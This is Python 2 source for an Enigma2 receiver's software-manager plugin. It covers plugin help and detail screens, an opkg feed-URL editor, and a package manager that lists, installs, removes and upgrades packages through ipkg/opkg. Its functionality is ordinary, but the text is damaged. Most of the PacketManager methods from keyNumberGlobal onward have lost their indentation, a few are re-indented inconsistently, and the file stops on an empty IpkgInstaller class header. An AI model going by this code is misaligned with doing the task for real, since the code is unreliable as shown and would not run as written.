	def rebuildList(self):
		"""Fill the list widget with one row per pending ipkg command."""
		self.list = []
		if self.cmdlist is not None:
			for entry in self.cmdlist:
				cmd = entry[0]
				# NOTE(review): 0 and 2 are assumed to correspond to
				# IpkgComponent.CMD_INSTALL and CMD_REMOVE — confirm against
				# the IpkgComponent constants.
				if cmd == 0:
					action = 'install'
				elif cmd == 2:
					action = 'remove'
				else:
					action = 'upgrade'
				args = entry[1]
				if cmd in (0, 2):
					info = args['package']
				else:
					info = _("receiver software because updates are available.")
				self.list.append(self.buildEntryComponent(action, info))
			self['list'].setList(self.list)
			self['list'].updateList(self.list)

	def buildEntryComponent(self, action, info):
		"""Return one list row: (label, info, action icon, divider pixmap)."""
		divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
		upgradepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
		installpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/install.png"))
		removepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
		if action == 'install':
			return (_('Installing'), info, installpng, divpng)
		elif action == 'remove':
			return (_('Removing'), info, removepng, divpng)
		else:
			return (_('Upgrading'), info, upgradepng, divpng)

	def exit(self):
		self.close()

	def process_all(self):
		"""OK: run the complete command list, including the system upgrade."""
		self.close((True, None))

	def process_extensions(self):
		"""Green: run only the install (0) and remove (2) tasks, skipping the upgrade."""
		self.list = []
		if self.cmdlist is not None:
			self.list = [entry for entry in self.cmdlist if entry[0] in (0, 2)]
		self.close((False, self.list))
class PluginManagerHelp(Screen):
	"""Static help screen explaining the icon states used by the plugin manager."""
	skin = """
		<screen name="PluginManagerHelp" position="center,center" size="560,450" title="Plugin manager help" >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="list" render="Listbox" position="5,50" size="550,350" scrollbarMode="showOnDemand" selectionDisabled="1">
				<convert type="TemplatedMultiContent">
					{"template": [
							MultiContentEntryText(pos = (50, 0), size = (540, 26), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
							MultiContentEntryText(pos = (50, 27), size = (540, 23), font=1, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the state
							MultiContentEntryPixmapAlphaTest(pos = (0, 1), size = (48, 48), png = 2), # index 2 is the status pixmap
							MultiContentEntryPixmapAlphaTest(pos = (0, 48), size = (550, 2), png = 3), # index 3 is the div pixmap
						],
					"fonts": [gFont("Regular", 24),gFont("Regular", 22)],
					"itemHeight": 50
					}
				</convert>
			</widget>
			<ePixmap pixmap="skin_default/div-h.png" position="0,404" zPosition="10" size="560,2" transparent="1" alphatest="on" />
			<widget source="status" render="Label" position="5,408" zPosition="10" size="550,44" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
		</screen>"""

	def __init__(self, session, plugin_path):
		Screen.__init__(self, session)
		self.session = session
		self.skin_path = plugin_path
		self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
		{
			"back": self.exit,
			"red": self.exit,
		}, -1)
		self.list = []
		self["list"] = List(self.list)
		self["key_red"] = StaticText(_("Close"))
		self["status"] = StaticText(_("A small overview of the available icon states and actions."))
		self.onShown.append(self.setWindowTitle)
		self.onLayoutFinish.append(self.rebuildList)

	def setWindowTitle(self):
		self.setTitle(_("Plugin manager help"))

	def rebuildList(self):
		# One explanatory row per possible icon state.
		self.list = []
		self.list.append(self.buildEntryComponent('install'))
		self.list.append(self.buildEntryComponent('installable'))
		self.list.append(self.buildEntryComponent('installed'))
		self.list.append(self.buildEntryComponent('remove'))
		self['list'].setList(self.list)
		self['list'].updateList(self.list)

	def buildEntryComponent(self, state):
		"""Return a row (title, explanation, icon, divider) for one icon state.

		Returns None (implicitly) for an unknown state.
		"""
		divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
		installedpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installed.png"))
		installablepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installable.png"))
		removepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
		installpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/install.png"))
		if state == 'installed':
			return(( _('This plugin is installed.'), _('You can remove this plugin.'), installedpng, divpng))
		elif state == 'installable':
			return(( _('This plugin is not installed.'), _('You can install this plugin.'), installablepng, divpng))
		elif state == 'install':
			return(( _('This plugin will be installed.'), _('You can cancel the installation.'), installpng, divpng))
		elif state == 'remove':
			return(( _('This plugin will be removed.'), _('You can cancel the removal.'), removepng, divpng))

	def exit(self):
		self.close()
class PluginDetails(Screen, PackageInfoHandler):
	"""Detail view for one plugin: description, author and screenshot, plus an
	install or remove action depending on the plugin's current state."""
	skin = """
		<screen name="PluginDetails" position="center,center" size="600,440" title="Plugin details" >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
			<widget source="author" render="Label" position="10,50" size="500,25" zPosition="10" font="Regular;21" transparent="1" />
			<widget name="statuspic" position="550,40" size="48,48" alphatest="on"/>
			<widget name="divpic" position="0,80" size="600,2" alphatest="on"/>
			<widget name="detailtext" position="10,90" size="270,330" zPosition="10" font="Regular;21" transparent="1" halign="left" valign="top"/>
			<widget name="screenshot" position="290,90" size="300,330" alphatest="on"/>
		</screen>"""

	def __init__(self, session, plugin_path, packagedata = None):
		# packagedata is one plugin list row: [0]=name, [1]=details file,
		# [4]=state, [5]=status pixmap, [6]=divider pixmap.
		Screen.__init__(self, session)
		self.skin_path = plugin_path
		self.language = language.getLanguage()[:2] # getLanguage returns e.g. "fi_FI" for "language_country"
		self.attributes = None
		PackageInfoHandler.__init__(self, self.statusCallback, blocking = False)
		self.directory = resolveFilename(SCOPE_METADIR)
		if packagedata:
			self.pluginname = packagedata[0]
			self.details = packagedata[1]
			self.pluginstate = packagedata[4]
			self.statuspicinstance = packagedata[5]
			self.divpicinstance = packagedata[6]
			self.fillPackageDetails(self.details)
		# NOTE(review): when packagedata is None, self.pluginname etc. stay
		# unset and later accesses (e.g. setWindowTitle) would raise —
		# confirm every caller passes packagedata.
		self.thumbnail = ""
		self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
		{
			"back": self.exit,
			"red": self.exit,
			"green": self.go,
			"up": self.pageUp,
			"down": self.pageDown,
			"left": self.pageUp,
			"right": self.pageDown,
		}, -1)
		self["key_red"] = StaticText(_("Close"))
		self["key_green"] = StaticText("")
		self["author"] = StaticText()
		self["statuspic"] = Pixmap()
		self["divpic"] = Pixmap()
		self["screenshot"] = Pixmap()
		self["detailtext"] = ScrollLabel()
		# Hidden until the screenshot/state pixmaps have been decoded.
		self["statuspic"].hide()
		self["screenshot"].hide()
		self["divpic"].hide()
		self.package = self.packageDetails[0]
		if self.package[0].has_key("attributes"):
			self.attributes = self.package[0]["attributes"]
		self.restartRequired = False
		self.cmdList = []
		self.oktext = _("\nAfter pressing OK, please wait!")
		self.picload = ePicLoad()
		self.picload.PictureData.get().append(self.paintScreenshotPixmapCB)
		self.onShown.append(self.setWindowTitle)
		self.onLayoutFinish.append(self.setInfos)

	def setWindowTitle(self):
		self.setTitle(_("Details for plugin: ") + self.pluginname )

	def exit(self):
		self.close(False)

	def pageUp(self):
		self["detailtext"].pageUp()

	def pageDown(self):
		self["detailtext"].pageDown()

	def statusCallback(self, status, progress):
		# PackageInfoHandler progress callback — nothing to display here.
		pass

	def setInfos(self):
		"""Populate author, description and the green button from the meta attributes."""
		# NOTE(review): assumes self.attributes was found in __init__; if the
		# meta file had no "attributes" entry this raises on None — confirm.
		if self.attributes.has_key("screenshot"):
			self.loadThumbnail(self.attributes)
		if self.attributes.has_key("name"):
			self.pluginname = self.attributes["name"]
		else:
			self.pluginname = _("unknown")
		if self.attributes.has_key("author"):
			self.author = self.attributes["author"]
		else:
			self.author = _("unknown")
		if self.attributes.has_key("description"):
			self.description = _(self.attributes["description"].replace("\\n", "\n"))
		else:
			self.description = _("No description available.")
		self["author"].setText(_("Author: ") + self.author)
		self["detailtext"].setText(_(self.description))
		if self.pluginstate in ('installable', 'install'):
			# Installing needs network access; hide the action otherwise.
			if iSoftwareTools.NetworkConnectionAvailable:
				self["key_green"].setText(_("Install"))
			else:
				self["key_green"].setText("")
		else:
			self["key_green"].setText(_("Remove"))

	def loadThumbnail(self, entry):
		"""Download the screenshot referenced by the meta entry (or show the placeholder)."""
		thumbnailUrl = None
		if entry.has_key("screenshot"):
			thumbnailUrl = entry["screenshot"]
			# German UI: prefer a "_de" variant of an "_en" screenshot if named that way.
			if self.language == "de":
				if thumbnailUrl[-7:] == "_en.jpg":
					thumbnailUrl = thumbnailUrl[:-7] + "_de.jpg"
		if thumbnailUrl is not None:
			self.thumbnail = "/tmp/" + thumbnailUrl.split('/')[-1]
			print "[PluginDetails] downloading screenshot " + thumbnailUrl + " to " + self.thumbnail
			if iSoftwareTools.NetworkConnectionAvailable:
				client.downloadPage(thumbnailUrl,self.thumbnail).addCallback(self.setThumbnail).addErrback(self.fetchFailed)
			else:
				self.setThumbnail(noScreenshot = True)
		else:
			self.setThumbnail(noScreenshot = True)

	def setThumbnail(self, noScreenshot = False):
		"""Start decoding the downloaded screenshot (or the noprev placeholder)."""
		if not noScreenshot:
			filename = self.thumbnail
		else:
			filename = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/noprev.png")
		sc = AVSwitch().getFramebufferScale()
		self.picload.setPara((self["screenshot"].instance.size().width(), self["screenshot"].instance.size().height(), sc[0], sc[1], False, 1, "#00000000"))
		self.picload.startDecode(filename)
		# Show the state/divider pixmaps handed over from the list screen.
		if self.statuspicinstance != None:
			self["statuspic"].instance.setPixmap(self.statuspicinstance.__deref__())
			self["statuspic"].show()
		if self.divpicinstance != None:
			self["divpic"].instance.setPixmap(self.divpicinstance.__deref__())
			self["divpic"].show()

	def paintScreenshotPixmapCB(self, picInfo=None):
		# ePicLoad decode-finished callback; fall back to the placeholder on failure.
		ptr = self.picload.getData()
		if ptr != None:
			self["screenshot"].instance.setPixmap(ptr.__deref__())
			self["screenshot"].show()
		else:
			self.setThumbnail(noScreenshot = True)

	def go(self):
		"""Green button: build the install or remove command list and ask for confirmation."""
		if self.attributes.has_key("package"):
			self.packagefiles = self.attributes["package"]
		if self.attributes.has_key("needsRestart"):
			self.restartRequired = True
		self.cmdList = []
		if self.pluginstate in ('installed', 'remove'):
			if self.packagefiles:
				for package in self.packagefiles[:]:
					self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package["name"] }))
					if len(self.cmdList):
						self.session.openWithCallback(self.runRemove, MessageBox, _("Do you want to remove the package:\n") + self.pluginname + "\n" + self.oktext)
		else:
			if iSoftwareTools.NetworkConnectionAvailable:
				if self.packagefiles:
					for package in self.packagefiles[:]:
						self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package["name"] }))
						if len(self.cmdList):
							self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to install the package:\n") + self.pluginname + "\n" + self.oktext)

	def runUpgrade(self, result):
		if result:
			self.session.openWithCallback(self.runUpgradeFinished, Ipkg, cmdList = self.cmdList)

	def runUpgradeFinished(self):
		"""Install finished: reload plugins and offer a reboot when required."""
		self.reloadPluginlist()
		if plugins.restartRequired or self.restartRequired:
			self.session.openWithCallback(self.UpgradeReboot, MessageBox, _("Installation has completed.") + "\n" + _("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
		else:
			self.close(True)

	def UpgradeReboot(self, result):
		if result:
			self.session.open(TryQuitMainloop,retvalue=3)
		self.close(True)

	def runRemove(self, result):
		if result:
			self.session.openWithCallback(self.runRemoveFinished, Ipkg, cmdList = self.cmdList)

	def runRemoveFinished(self):
		self.close(True)

	def reloadPluginlist(self):
		plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))

	def fetchFailed(self,string):
		# Twisted errback for the screenshot download: show the placeholder.
		self.setThumbnail(noScreenshot = True)
		print "[PluginDetails] fetch failed " + string.getErrorMessage()
class IPKGMenu(Screen):
	"""Lists the editable opkg feed configuration files from /etc/opkg and
	opens the selected one in IPKGSource."""
	skin = """
		<screen name="IPKGMenu" position="center,center" size="560,400" title="Select upgrade source to edit." >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
			<widget name="filelist" position="5,50" size="550,340" scrollbarMode="showOnDemand" />
		</screen>"""

	def __init__(self, session, plugin_path):
		Screen.__init__(self, session)
		self.skin_path = plugin_path
		self["key_red"] = StaticText(_("Close"))
		self["key_green"] = StaticText(_("Edit"))
		self.sel = []
		self.val = []
		self.entry = False		# True once at least one editable .conf file was found
		self.exe = False
		self.path = ""
		self["actions"] = NumberActionMap(["SetupActions"],
		{
			"ok": self.KeyOk,
			"cancel": self.keyCancel
		}, -1)
		self["shortcuts"] = ActionMap(["ShortcutActions"],
		{
			"red": self.keyCancel,
			"green": self.KeyOk,
		})
		self["filelist"] = MenuList([])
		self.fill_list()
		self.onLayoutFinish.append(self.layoutFinished)

	def layoutFinished(self):
		self.setWindowTitle()

	def setWindowTitle(self):
		self.setTitle(_("Select upgrade source to edit."))

	def fill_list(self):
		"""Collect all *.conf files from /etc/opkg except arch.conf/opkg.conf."""
		flist = []
		self.path = '/etc/opkg/'
		if not os_path.exists(self.path):
			self.entry = False
			return
		# "fname" instead of "file": don't shadow the builtin.
		for fname in listdir(self.path):
			if fname.endswith(".conf"):
				if fname not in ('arch.conf', 'opkg.conf'):
					flist.append(fname)
					self.entry = True
		self["filelist"].l.setList(flist)

	def KeyOk(self):
		"""Open the editor for the highlighted feed file."""
		if (self.exe == False) and (self.entry == True):
			self.sel = self["filelist"].getCurrent()
			if self.sel is None:
				# Empty list — nothing to edit.
				return
			self.val = self.path + self.sel
			self.session.open(IPKGSource, self.val)

	def keyCancel(self):
		self.close()

	def Exit(self):
		self.close()
class IPKGSource(Screen):
	"""Single-line editor for an opkg feed configuration file: loads the first
	line of the file and writes the edited line back on save."""
	skin = """
		<screen name="IPKGSource" position="center,center" size="560,80" title="Edit upgrade source url." >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
			<widget name="text" position="5,50" size="550,25" font="Regular;20" backgroundColor="background" foregroundColor="#cccccc" />
		</screen>"""

	def __init__(self, session, configfile = None):
		Screen.__init__(self, session)
		self.session = session
		self.configfile = configfile
		text = ""
		if self.configfile:
			try:
				# "open" + "with" replaces the removed "file()" builtin and
				# guarantees the handle is closed even on a read error.
				with open(configfile, 'r') as fp:
					sources = fp.readlines()
				if sources:
					text = sources[0]
			except IOError:
				# Missing/unreadable file: start with an empty input line.
				pass
		desk = getDesktop(0)
		height = int(desk.size().height())
		self["key_red"] = StaticText(_("Cancel"))
		self["key_green"] = StaticText(_("Save"))
		if height >= 720:
			self["text"] = Input(text, maxSize=False, type=Input.TEXT)
		else:
			# Smaller displays get a constrained visible width.
			self["text"] = Input(text, maxSize=False, visible_width = 55, type=Input.TEXT)
		self["actions"] = NumberActionMap(["WizardActions", "InputActions", "TextEntryActions", "KeyboardInputActions","ShortcutActions"],
		{
			"ok": self.go,
			"back": self.close,
			"red": self.close,
			"green": self.go,
			"left": self.keyLeft,
			"right": self.keyRight,
			"home": self.keyHome,
			"end": self.keyEnd,
			"deleteForward": self.keyDeleteForward,
			"deleteBackward": self.keyDeleteBackward,
			"1": self.keyNumberGlobal,
			"2": self.keyNumberGlobal,
			"3": self.keyNumberGlobal,
			"4": self.keyNumberGlobal,
			"5": self.keyNumberGlobal,
			"6": self.keyNumberGlobal,
			"7": self.keyNumberGlobal,
			"8": self.keyNumberGlobal,
			"9": self.keyNumberGlobal,
			"0": self.keyNumberGlobal
		}, -1)
		self.onLayoutFinish.append(self.layoutFinished)

	def layoutFinished(self):
		self.setWindowTitle()
		self["text"].right()

	def setWindowTitle(self):
		self.setTitle(_("Edit upgrade source url."))

	def go(self):
		"""Write the edited line back to the config file (if non-empty) and close."""
		text = self["text"].getText()
		if text:
			with open(self.configfile, 'w') as fp:
				fp.write(text)
				fp.write("\n")
		self.close()

	def keyLeft(self):
		self["text"].left()

	def keyRight(self):
		self["text"].right()

	def keyHome(self):
		self["text"].home()

	def keyEnd(self):
		self["text"].end()

	def keyDeleteForward(self):
		self["text"].delete()

	def keyDeleteBackward(self):
		self["text"].deleteBackward()

	def keyNumberGlobal(self, number):
		self["text"].number(number)
class PacketManager(Screen, NumericalTextInput):
	"""Low-level package manager: lists every opkg package with its
	installed / installable / upgradeable state and lets the user install,
	remove or upgrade it.  NumericalTextInput is mixed in so number keys
	jump to the first entry starting with the mapped character."""
	skin = """
		<screen name="PacketManager" position="center,center" size="530,420" title="Packet manager" >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
			<widget source="list" render="Listbox" position="5,50" size="520,365" scrollbarMode="showOnDemand">
				<convert type="TemplatedMultiContent">
					{"template": [
							MultiContentEntryText(pos = (5, 1), size = (440, 28), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
							MultiContentEntryText(pos = (5, 26), size = (440, 20), font=1, flags = RT_HALIGN_LEFT, text = 2), # index 2 is the description
							MultiContentEntryPixmapAlphaTest(pos = (445, 2), size = (48, 48), png = 4), # index 4 is the status pixmap
							MultiContentEntryPixmapAlphaTest(pos = (5, 50), size = (510, 2), png = 5), # index 4 is the div pixmap
						],
					"fonts": [gFont("Regular", 22),gFont("Regular", 14)],
					"itemHeight": 52
					}
				</convert>
			</widget>
		</screen>"""
	def __init__(self, session, plugin_path, args = None):
		"""Set up widgets, key bindings, the ipkg component and the list cache."""
		Screen.__init__(self, session)
		NumericalTextInput.__init__(self)
		self.session = session
		self.skin_path = plugin_path
		# Characters reachable via the numeric keypad for jump-to-entry.
		self.setUseableChars(u'1234567890abcdefghijklmnopqrstuvwxyz')
		self["shortcuts"] = NumberActionMap(["ShortcutActions", "WizardActions", "NumberActions", "InputActions", "InputAsciiActions", "KeyboardInputActions" ],
		{
			"ok": self.go,
			"back": self.exit,
			"red": self.exit,
			"green": self.reload,
			"gotAsciiCode": self.keyGotAscii,
			"1": self.keyNumberGlobal,
			"2": self.keyNumberGlobal,
			"3": self.keyNumberGlobal,
			"4": self.keyNumberGlobal,
			"5": self.keyNumberGlobal,
			"6": self.keyNumberGlobal,
			"7": self.keyNumberGlobal,
			"8": self.keyNumberGlobal,
			"9": self.keyNumberGlobal,
			"0": self.keyNumberGlobal
		}, -1)
		self.list = []
		self.statuslist = []
		self["list"] = List(self.list)
		self["key_red"] = StaticText(_("Close"))
		self["key_green"] = StaticText(_("Reload"))
		self.list_updating = True
		self.packetlist = []
		self.installed_packetlist = {}
		self.upgradeable_packages = {}
		self.Console = Console()
		self.cmdList = []
		self.cachelist = []
		self.cache_ttl = 86400 #600 is default, 0 disables, Seconds cache is considered valid (24h should be ok for caching ipkgs)
		self.cache_file = eEnv.resolve('${libdir}/enigma2/python/Plugins/SystemPlugins/SoftwareManager/packetmanager.cache') #Path to cache directory
		self.oktext = _("\nAfter pressing OK, please wait!")
		# Suffixes of packages hidden from the list (dev/debug/doc variants etc.).
		self.unwanted_extensions = ('-dbg', '-dev', '-doc', '-staticdev', '-src', 'busybox')
		self.ipkg = IpkgComponent()
		self.ipkg.addCallback(self.ipkgCallback)
		self.onShown.append(self.setWindowTitle)
		self.onLayoutFinish.append(self.rebuildList)
		# Switch the remote-control input to ASCII so keyboard characters
		# arrive via the "gotAsciiCode" action bound above.
		rcinput = eRCInput.getInstance()
		rcinput.setKeyboardMode(rcinput.kmAscii)
def keyNumberGlobal(self, val):
key = self.getKey(val)
if key is not None:
keyvalue = key.encode("utf-8")
if len(keyvalue) == 1:
self.setNextIdx(keyvalue[0])
def keyGotAscii(self):
keyvalue = unichr(getPrevAsciiCode()).encode("utf-8")
if len(keyvalue) == 1:
self.setNextIdx(keyvalue[0])
def setNextIdx(self,char):
if char in ("0", "1", "a"):
self["list"].setIndex(0)
else:
idx = self.getNextIdx(char)
if idx and idx <= self["list"].count:
self["list"].setIndex(idx)
def getNextIdx(self,char):
for idx, i in enumerate(self["list"].list):
if i[0] and (i[0][0] == char):
return idx
def exit(self):
self.ipkg.stop()
if self.Console is not None:
if len(self.Console.appContainers):
for name in self.Console.appContainers.keys():
self.Console.kill(name)
rcinput = eRCInput.getInstance()
rcinput.setKeyboardMode(rcinput.kmNone)
self.close()
def reload(self):
if (os_path.exists(self.cache_file) == True):
remove(self.cache_file)
self.list_updating = True
self.rebuildList()
	def setWindowTitle(self):
		# Set the screen title once the window is shown.
		self.setTitle(_("Packet manager"))
def setStatus(self,status = None):
if status:
self.statuslist = []
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if status == 'update':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
self.statuslist.append(( _("Package list update"), '', _("Trying to download a new packetlist. Please wait..." ),'',statuspng, divpng ))
self['list'].setList(self.statuslist)
elif status == 'error':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
self.statuslist.append(( _("Error"), '', _("An error occurred while downloading the packetlist. Please try again." ),'',statuspng, divpng ))
self['list'].setList(self.statuslist)
def rebuildList(self):
self.setStatus('update')
self.inv_cache = 0
self.vc = valid_cache(self.cache_file, self.cache_ttl)
if self.cache_ttl > 0 and self.vc != 0:
try:
self.buildPacketList()
except:
self.inv_cache = 1
if self.cache_ttl == 0 or self.inv_cache == 1 or self.vc == 0:
self.run = 0
self.ipkg.startCmd(IpkgComponent.CMD_UPDATE)
def go(self, returnValue = None):
cur = self["list"].getCurrent()
if cur:
status = cur[3]
package = cur[0]
self.cmdList = []
if status == 'installed':
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runRemove, MessageBox, _("Do you want to remove the package:\n") + package + "\n" + self.oktext)
elif status == 'upgradeable':
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to upgrade the package:\n") + package + "\n" + self.oktext)
elif status == "installable":
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to install the package:\n") + package + "\n" + self.oktext)
def runRemove(self, result):
if result:
self.session.openWithCallback(self.runRemoveFinished, Ipkg, cmdList = self.cmdList)
def runRemoveFinished(self):
self.session.openWithCallback(self.RemoveReboot, MessageBox, _("Removal has completed.") + "\n" + _("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
def RemoveReboot(self, result):
if result is None:
return
if result is False:
cur = self["list"].getCurrent()
if cur:
item = self['list'].getIndex()
self.list[item] = self.buildEntryComponent(cur[0], cur[1], cur[2], 'installable')
self.cachelist[item] = [cur[0], cur[1], cur[2], 'installable']
self['list'].setList(self.list)
write_cache(self.cache_file, self.cachelist)
self.reloadPluginlist()
if result:
self.session.open(TryQuitMainloop,retvalue=3)
def runUpgrade(self, result):
if result:
self.session.openWithCallback(self.runUpgradeFinished, Ipkg, cmdList = self.cmdList)
def runUpgradeFinished(self):
self.session.openWithCallback(self.UpgradeReboot, MessageBox, _("Update has completed.") + "\n" +_("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
def UpgradeReboot(self, result):
if result is None:
return
if result is False:
cur = self["list"].getCurrent()
if cur:
item = self['list'].getIndex()
self.list[item] = self.buildEntryComponent(cur[0], cur[1], cur[2], 'installed')
self.cachelist[item] = [cur[0], cur[1], cur[2], 'installed']
self['list'].setList(self.list)
write_cache(self.cache_file, self.cachelist)
self.reloadPluginlist()
if result:
self.session.open(TryQuitMainloop,retvalue=3)
def ipkgCallback(self, event, param):
if event == IpkgComponent.EVENT_ERROR:
self.list_updating = False
self.setStatus('error')
elif event == IpkgComponent.EVENT_DONE:
if self.list_updating:
self.list_updating = False
if not self.Console:
self.Console = Console()
cmd = self.ipkg.ipkg + " list"
self.Console.ePopen(cmd, self.IpkgList_Finished)
pass
def IpkgList_Finished(self, result, retval, extra_args = None):
if result:
self.packetlist = []
last_name = ""
for x in result.splitlines():
tokens = x.split(' - ')
name = tokens[0].strip()
if not any(name.endswith(x) for x in self.unwanted_extensions):
l = len(tokens)
version = l > 1 and tokens[1].strip() or ""
descr = l > 2 and tokens[2].strip() or ""
if name == last_name:
continue
last_name = name
self.packetlist.append([name, version, descr])
if not self.Console:
self.Console = Console()
cmd = self.ipkg.ipkg + " list_installed"
self.Console.ePopen(cmd, self.IpkgListInstalled_Finished)
def IpkgListInstalled_Finished(self, result, retval, extra_args = None):
    # Parse "ipkg list_installed" ("name - version") into a dict of
    # installed packages, then chain into "opkg list-upgradable".
    if result:
        self.installed_packetlist = {}
        for x in result.splitlines():
            tokens = x.split(' - ')
            name = tokens[0].strip()
            if not any(name.endswith(x) for x in self.unwanted_extensions):
                l = len(tokens)
                version = l > 1 and tokens[1].strip() or ""
                self.installed_packetlist[name] = version
    if not self.Console:
        self.Console = Console()
    cmd = "opkg list-upgradable"
    self.Console.ePopen(cmd, self.OpkgListUpgradeable_Finished)
def OpkgListUpgradeable_Finished(self, result, retval, extra_args = None):
    # Parse "opkg list-upgradable"; lines presumably read
    # "name - installed_version - available_version", hence tokens[2]
    # being taken as the candidate version — TODO confirm opkg format.
    if result:
        self.upgradeable_packages = {}
        for x in result.splitlines():
            tokens = x.split(' - ')
            name = tokens[0].strip()
            if not any(name.endswith(x) for x in self.unwanted_extensions):
                l = len(tokens)
                version = l > 2 and tokens[2].strip() or ""
                self.upgradeable_packages[name] = version
    # All three queries are done: build the final on-screen list.
    self.buildPacketList()
def buildEntryComponent(self, name, version, description, state):
    """Build one list row (texts, state icon and divider) for a package."""
    divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
    if not description:
        description = "No description available."
    # Pick the state icon; anything that is neither installed nor
    # upgradeable is shown as installable.
    icon_paths = {
        'installed': "SystemPlugins/SoftwareManager/installed.png",
        'upgradeable': "SystemPlugins/SoftwareManager/upgradeable.png",
    }
    icon = icon_paths.get(state, "SystemPlugins/SoftwareManager/installable.png")
    statepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, icon))
    return (name, version, _(description), state, statepng, divpng)
def buildPacketList(self):
self.list = []
self.cachelist = []
if self.cache_ttl > 0 and self.vc != 0:
print 'Loading packagelist cache from ',self.cache_file
try:
self.cachelist = load_cache(self.cache_file)
if len(self.cachelist) > 0:
for x in self.cachelist:
self.list.append(self.buildEntryComponent(x[0], x[1], x[2], x[3]))
self['list'].setList(self.list)
except:
self.inv_cache = 1
if self.cache_ttl == 0 or self.inv_cache == 1 or self.vc == 0:
print 'rebuilding fresh package list'
for x in self.packetlist:
status = ""
if self.installed_packetlist.has_key(x[0]):
if self.upgradeable_packages.has_key(x[0]):
status = "upgradeable"
else:
status = "installed"
else:
status = "installable"
self.list.append(self.buildEntryComponent(x[0], x[1], x[2], status))
self.cachelist.append([x[0], x[1], x[2], status])
write_cache(self.cache_file, self.cachelist)
self['list'].setList(self.list)
def reloadPluginlist(self):
    # Re-scan the plugin directory so newly (un)installed plugins show up.
    plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class IpkgInstaller(Screen):
